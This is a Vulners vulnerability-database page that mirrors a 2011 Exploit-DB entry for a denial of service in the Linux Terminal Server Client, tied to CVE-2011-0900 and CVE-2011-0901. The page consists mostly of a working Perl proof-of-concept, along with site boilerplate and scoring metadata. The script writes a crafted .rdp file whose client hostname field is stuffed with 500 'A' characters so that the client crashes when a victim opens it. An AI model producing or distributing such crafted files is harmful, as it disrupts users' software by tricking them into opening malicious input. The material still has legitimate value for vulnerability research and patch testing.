Lucene search
+L

Terminal Server Client - '.rdp' Denial of Service

🗓️ 02 Feb 2011 00:00:00Reported by D3V!L FUCKERType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Terminal Server Client .rdp Denial of Service exploit using Per

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2011-0900
2 Feb 201100:00
circl
circl
Circl
CVE-2011-0901
2 Feb 201100:00
circl
cve
CVE
CVE-2011-0900
7 Feb 201120:19
cve
cve
CVE
CVE-2011-0901
7 Feb 201120:19
cve
cvelist
Cvelist
CVE-2011-0900
7 Feb 201120:19
cvelist
cvelist
Cvelist
CVE-2011-0901
7 Feb 201120:19
cvelist
euvd
EUVD
EUVD-2011-0912
3 Oct 202520:07
euvd
euvd
EUVD
EUVD-2011-0913
3 Oct 202520:07
euvd
nvd
NVD
CVE-2011-0900
7 Feb 201121:00
nvd
nvd
NVD
CVE-2011-0901
7 Feb 201121:00
nvd
Rows per page
#!/usr/bin/perl
# Exploit Title: [Terminal Server Client .rdp Dos ]
# Date: [2011-02-01]
# Author: [D3V!L FUCKER]
# Software Link: [sudo apt-get install tsclient] ^_^
# Version: [All Version]
# Tested on: [ubuntu 10.10]
##############################################################
#press to open then chois the T-T34M.rdp file then connect ^_^
#C0d3d By : SarBoT511 XD
print q(

[email protected]
               _
              | |
              | |===( )   //////
              |_|   |||  | o o|
                     ||| ( c  )                  ____
                      ||| \= /                  ||   \_
                       ||||||                   ||     |
                       ||||||                ...||__/|-"
                       ||||||             __|________|__
                         |||             |______________|
                         |||             || ||      || ||
                         |||             || ||      || ||
 ------------------------|||-------------||-||------||-||-------
                         |__>            || ||      || ||


      hit any key to continue
);
$headr1="alternate full switch:i:0
alternate shell:s:
attach to console:i:0
audiomode:i:0
auto connect:i:0
diskmapping:i:0
bitmapcachepersistenable:i:1\n";
$buffer="client hostname:s:"."A" x 500;
$headr2="compression:i:0
description:s:
desktop size id:i:1
desktopheight:i:0
desktopwidth:i:0
disable full window drag:i:0
disable menu anims:i:0
disable themes:i:0
disable wallpaper:i:0
displayconnectionbar:i:0
domain:s:
enable alternate shell:i:0
enable wm keys:i:0
full address:s:127.0.0.1
hide wm decorations:i:0
keyboard language:s:
keyboardhook:i:0
no motion events:i:0
password:b:
password 51:b:
progman group:s:
protocol:i:0
protocol file:s:
redirectcomports:i:0
redirectdrives:i:0
redirectprinters:i:0
redirectsmartcards:i:0
screen mode id:i:1
session bpp:i:0
shell working directory:s:
username:s:
winposstr:s:";
open (myfile,'>>T-T34M.rdp');
print myfile $headr1.$buffer.$headr2;
close(myfile);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Feb 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.05207
41